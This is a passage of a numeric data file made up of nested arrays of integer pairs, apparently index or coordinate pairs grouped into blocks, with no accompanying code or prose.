26],[ 12 , 28],[ 12 , 31],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 13 , 20],[ 13 , 23],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 14 , 20],[ 14 , 23],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 27],[ 15 , 30],[ 15 , 32],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 37],[ 16 , 21],[ 16 , 24],[ 16 , 26],[ 16 , 27],[ 16 , 30],[ 16 , 32],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 37],[ 17 , 21],[ 17 , 24],[ 17 , 26],[ 17 , 27],[ 17 , 30],[ 17 , 32],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 37]],[ [1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 6 , 18],[ 6 , 19],[ 6 , 20],[ 6 , 21],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 7 , 18],[ 7 , 19],[ 7 , 20],[ 7 , 21],[ 7 , 28],[ 7 , 29],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 8 , 18],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 28],[ 8 , 29],[ 8 , 30],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 18],[ 9 , 22],[ 9 , 23],[ 9 , 24],[ 9 , 28],[ 9 , 29],[ 9 , 30],[ 9 , 34],[ 9 , 35],[ 9 , 36],[ 10 , 18],[ 10 , 22],[ 10 , 23],[ 10 , 24],[ 10 , 28],[ 10 , 29],[ 10 , 30],[ 10 , 34],[ 10 , 35],[ 10 , 36],[ 11 , 19],[ 11 , 22],[ 11 , 25],[ 11 , 26],[ 11 , 28],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 12 , 19],[ 12 , 22],[ 12 , 25],[ 12 , 26],[ 12 , 28],[ 12 , 31],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 13 , 20],[ 13 , 23],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 14 , 20],[ 14 , 23],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 15 , 20],[ 15 , 23],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 34],[ 15 , 36],[ 15 , 37],[ 16 , 21],[ 16 , 24],[ 16 , 26],[ 16 , 27],[ 16 , 30],[ 16 , 32],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 37],[ 17 , 21],[ 17 , 24],[ 17 , 26],[ 17 , 27],[ 17 , 30],[ 17 , 32],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 37]],[ [1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 24],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 8 , 21],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 31],[ 8 , 32],[ 8 , 33],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 21],[ 9 , 25],[ 9 , 26],[ 9 , 27],[ 9 , 31],[ 9 , 32],[ 9 , 33],[ 9 , 37],[ 9 , 38],[ 9 , 39],[ 10 , 21],[ 10 , 25],[ 10 , 26],[ 10 , 27],[ 10 , 31],[ 10 , 32],[ 10 , 33],[ 10 , 37],[ 10 , 38],[ 10 , 39],[ 11 , 21],[ 11 , 25],[ 11 , 26],[ 11 , 27],[ 11 , 31],[ 11 , 32],[ 11 , 33],[ 11 , 37],[ 11 , 38],[ 11 , 39],[ 12 , 21],[ 12 , 25],[ 12 , 26],[ 12 , 27],[ 12 , 31],[ 12 , 32],[ 12 , 33],[ 12 , 37],[ 12 , 38],[ 12 , 39],[ 13 , 22],[ 13 , 25],[ 13 , 28],[ 13 , 29],[ 13 , 31],[ 13 , 34],[ 13 , 35],[ 13 , 37],[ 13 , 38],[ 13 , 40],[ 14 , 22],[ 14 , 25],[ 14 , 28],[ 14 , 29],[ 14 , 31],[ 14 , 34],[ 14 , 35],[ 14 , 37],[ 14 , 38],[ 14 , 40],[ 15 , 22],[ 15 , 25],[ 15 , 28],[ 15 , 29],[ 15 , 31],[ 15 , 34],[ 15 , 35],[ 15 , 37],[ 15 , 38],[ 15 , 40],[ 16 , 22],[ 16 , 25],[ 16 , 28],[ 16 , 29],[ 16 , 31],[ 16 , 34],[ 16 , 35],[ 16 , 37],[ 16 , 38],[ 16 , 40],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 30],[ 17 , 32],[ 17 , 34],[ 17 , 36],[ 17 , 37],[ 17 , 39],[ 17 , 40],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 30],[ 18 , 32],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 39],[ 18 , 40],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 30],[ 19 , 32],[ 19 , 34],[ 19 , 36],[ 19 , 37],[ 19 , 39],[ 19 , 40],[ 20 , 24],[ 20 , 27],[ 20 , 29],[ 20 , 30],[ 20 , 33],[ 20 , 35],[ 20 , 36],[ 20 , 38],[ 20 , 39],[ 20 , 40]],[ [1 , 15],[ 1 , 16],[ 1 , 17],[ 1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 2 , 15],[ 2 , 16],[ 2 , 17],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 3 , 15],[ 3 , 16],[ 3 , 17],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 4 , 15],[ 4 , 16],[ 4 , 17],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 5 , 15],[ 5 , 16],[ 5 , 17],[ 5 , 18],[ 5 , 25],[ 5 , 26],[ 5 , 27],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 6 , 15],[ 6 , 16],[ 6 , 17],[ 6 , 18],[ 6 , 25],[ 6 , 26],[ 6 , 27],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 7 , 15],[ 7 , 19],[ 7 , 20],[ 7 , 21],[ 7 , 25],[ 7 , 26],[ 7 , 27],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 8 , 16],[ 8 , 19],[ 8 , 22],[ 8 , 23],[ 8 , 25],[ 8 , 28],[ 8 , 29],[ 8 , 31],[ 8 , 32],[ 8 , 34],[ 9 , 16],[ 9 , 19],[ 9 , 22],[ 9 , 23],[ 9 , 25],[ 9 , 28],[ 9 , 29],[ 9 , 31],[ 9 , 32],[ 9 , 34],[ 10 , 16],[ 10 , 19],[ 10 , 22],[ 10 , 23],[ 10 , 25],[ 10 , 28],[ 10 , 29],[ 10 , 31],[ 10 , 32],[ 10 , 34],[ 11 , 17],[ 11 , 20],[ 11 , 22],[ 11 , 24],[ 11 , 26],[ 11 , 28],[ 11 , 30],[ 11 , 31],[ 11 , 33],[ 11 , 34],[ 12 , 17],[ 12 , 20],[ 12 , 22],[ 12 , 24],[ 12 , 26],[ 12 , 28],[ 12 , 30],[ 12 , 31],[ 12 , 33],[ 12 , 34],[ 13 , 17],[ 13 , 20],[ 13 , 22],[ 13 , 24],[ 13 , 26],[ 13 , 28],[ 13 , 30],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 14 , 18],[ 14 , 21],[ 14 , 23],[ 14 , 24],[ 14 , 27],[ 14 , 29],[ 14 , 30],[ 14 , 32],[ 14 , 33],[ 14 , 34]],[ [1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 31],[ 3 , 32],[ 3 , 33],[ 3 , 34],[ 3 , 35],[ 3 , 36],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 4 , 35],[ 4 , 36],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 24],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 7 , 21],[ 7 , 25],[ 7 , 26],[ 7 , 27],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 37],[ 7 , 38],[ 7 , 39],[ 8 , 21],[ 8 , 25],[ 8 , 26],[ 8 , 27],[ 8 , 31],[ 8 , 32],[ 8 , 33],[ 8 , 37],[ 8 , 38],[ 8 , 39],[ 9 , 21],[ 9 , 25],[ 9 , 26],[ 9 , 27],[ 9 , 31],[ 9 , 32],[ 9 , 33],[ 9 , 37],[ 9 , 38],[ 9 , 39],[ 10 , 21],[ 10 , 25],[ 10 , 26],[ 10 , 27],[ 10 , 31],[ 10 , 32],[ 10 , 33],[ 10 , 37],[ 10 , 38],[ 10 , 39],[ 11 , 22],[ 11 , 25],[ 11 , 28],[ 11 , 29],[ 11 , 31],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 11 , 38],[ 11 , 40],[ 12 , 22],[ 12 , 25],[ 12 , 28],[ 12 , 29],[ 12 , 31],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 12 , 38],[ 12 , 40],[ 13 , 23],[ 13 , 26],[ 13 , 28],[ 13 , 30],[ 13 , 32],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 13 , 40],[ 14 , 23],[ 14 , 26],[ 14 , 28],[ 14 , 30],[ 14 , 32],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 14 , 39],[ 14 , 40],[ 15 , 23],[ 15 , 26],[ 15 , 28],[ 15 , 30],[ 15 , 32],[ 15 , 34],[ 15 , 36],[ 15 , 37],[ 15 , 39],[ 15 , 40],[ 16 , 23],[ 16 , 26],[ 16 , 28],[ 16 , 30],[ 16 , 32],[ 16 , 34],[ 16 , 36],[ 16 , 37],[ 16 , 39],[ 16 , 40],[ 17 , 24],[ 17 , 27],[ 17 , 29],[ 17 , 30],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 38],[ 17 , 39],[ 17 , 40],[ 18 , 24],[ 18 , 27],[ 18 , 29],[ 18 , 30],[ 18 , 33],[ 18 , 35],[ 18 , 36],[ 18 , 38],[ 18 , 39],[ 18 , 40],[ 19 , 24],[ 19 , 27],[ 19 , 29],[ 19 , 30],[ 19 , 33],[ 19 , 35],[ 19 , 36],[ 19 , 38],[ 19 , 39],[ 19 , 40],[ 20 , 24],[ 20 , 27],[ 20 , 29],[ 20 , 30],[ 20 , 33],[ 20 , 35],[ 20 , 36],[ 20 , 38],[ 20 , 39],[ 20 , 40]],[ [1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 24],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 8 , 21],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 31],[ 8 , 32],[ 8 , 33],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 21],[ 9 , 25],[ 9 , 26],[ 9 , 27],[ 9 , 31],[ 9 , 32],[ 9 , 33],[ 9 , 37],[ 9 , 38],[ 9 , 39],[ 10 , 21],[ 10 , 25],[ 10 , 26],[ 10 , 27],[ 10 , 31],[ 10 , 32],[ 10 , 33],[ 10 , 37],[ 10 , 38],[ 10 , 39],[ 11 , 22],[ 11 , 25],[ 11 , 28],[ 11 , 29],[ 11 , 31],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 11 , 38],[ 11 , 40],[ 12 , 22],[ 12 , 25],[ 12 , 28],[ 12 , 29],[ 12 , 31],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 12 , 38],[ 12 , 40],[ 13 , 22],[ 13 , 25],[ 13 , 28],[ 13 , 29],[ 13 , 31],[ 13 , 34],[ 13 , 35],[ 13 , 37],[ 13 , 38],[ 13 , 40],[ 14 , 23],[ 14 , 26],[ 14 , 28],[ 14 , 30],[ 14 , 32],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 14 , 39],[ 14 , 40],[ 15 , 23],[ 15 , 26],[ 15 , 28],[ 15 , 30],[ 15 , 32],[ 15 , 34],[ 15 , 36],[ 15 , 37],[ 15 , 39],[ 15 , 40],[ 16 , 23],[ 16 , 26],[ 16 , 28],[ 16 , 30],[ 16 , 32],[ 16 , 34],[ 16 , 36],[ 16 , 37],[ 16 , 39],[ 16 , 40],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 30],[ 17 , 32],[ 17 , 34],[ 17 , 36],[ 17 , 37],[ 17 , 39],[ 17 , 40],[ 18 , 24],[ 18 , 27],[ 18 , 29],[ 18 , 30],[ 18 , 33],[ 18 , 35],[ 18 , 36],[ 18 , 38],[ 18 , 39],[ 18 , 40],[ 19 , 24],[ 19 , 27],[ 19 , 29],[ 19 , 30],[ 19 , 33],[ 19 , 35],[ 19 , 36],[ 19 , 38],[ 19 , 39],[ 19 , 40],[ 20 , 24],[ 20 , 27],[ 20 , 29],[ 20 , 30],[ 20 , 33],[ 20 , 35],[ 20 , 36],[ 20 , 38],[ 20 , 39],[ 20 , 40]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 4 , 35],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 24],[ 7 , 25],[ 7 , 26],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 36],[ 7 , 37],[ 7 , 38],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 21],[ 10 , 24],[ 10 , 27],[ 10 , 28],[ 10 , 30],[ 10 , 33],[ 10 , 34],[ 10 , 36],[ 10 , 37],[ 10 , 39],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 22],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 35],[ 13 , 36],[ 13 , 38],[ 13 , 39],[ 14 , 22],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 23],[ 16 , 26],[ 16 , 28],[ 16 , 29],[ 16 , 32],[ 16 , 34],[ 16 , 35],[ 16 , 37],[ 16 , 38],[ 16 , 39],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 29],[ 17 , 32],[ 17 , 34],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 6 , 18],[ 6 , 19],[ 6 , 20],[ 6 , 21],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 7 , 18],[ 7 , 19],[ 7 , 20],[ 7 , 21],[ 7 , 28],[ 7 , 29],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 8 , 18],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 28],[ 8 , 29],[ 8 , 30],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 18],[ 9 , 22],[ 9 , 23],[ 9 , 24],[ 9 , 28],[ 9 , 29],[ 9 , 30],[ 9 , 34],[ 9 , 35],[ 9 , 36],[ 10 , 19],[ 10 , 22],[ 10 , 25],[ 10 , 26],[ 10 , 28],[ 10 , 31],[ 10 , 32],[ 10 , 34],[ 10 , 35],[ 10 , 37],[ 11 , 19],[ 11 , 22],[ 11 , 25],[ 11 , 26],[ 11 , 28],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 12 , 19],[ 12 , 22],[ 12 , 25],[ 12 , 26],[ 12 , 28],[ 12 , 31],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 13 , 19],[ 13 , 22],[ 13 , 25],[ 13 , 26],[ 13 , 28],[ 13 , 31],[ 13 , 32],[ 13 , 34],[ 13 , 35],[ 13 , 37],[ 14 , 20],[ 14 , 23],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 27],[ 15 , 30],[ 15 , 32],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 37],[ 16 , 21],[ 16 , 24],[ 16 , 26],[ 16 , 27],[ 16 , 30],[ 16 , 32],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 37],[ 17 , 21],[ 17 , 24],[ 17 , 26],[ 17 , 27],[ 17 , 30],[ 17 , 32],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 37]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 4 , 35],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 24],[ 7 , 25],[ 7 , 26],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 36],[ 7 , 37],[ 7 , 38],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 20],[ 10 , 24],[ 10 , 25],[ 10 , 26],[ 10 , 30],[ 10 , 31],[ 10 , 32],[ 10 , 36],[ 10 , 37],[ 10 , 38],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 21],[ 13 , 24],[ 13 , 27],[ 13 , 28],[ 13 , 30],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 14 , 21],[ 14 , 24],[ 14 , 27],[ 14 , 28],[ 14 , 30],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 22],[ 17 , 25],[ 17 , 27],[ 17 , 29],[ 17 , 31],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 4 , 35],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 20],[ 10 , 24],[ 10 , 25],[ 10 , 26],[ 10 , 30],[ 10 , 31],[ 10 , 32],[ 10 , 36],[ 10 , 37],[ 10 , 38],[ 11 , 20],[ 11 , 24],[ 11 , 25],[ 11 , 26],[ 11 , 30],[ 11 , 31],[ 11 , 32],[ 11 , 36],[ 11 , 37],[ 11 , 38],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 21],[ 13 , 24],[ 13 , 27],[ 13 , 28],[ 13 , 30],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 14 , 21],[ 14 , 24],[ 14 , 27],[ 14 , 28],[ 14 , 30],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 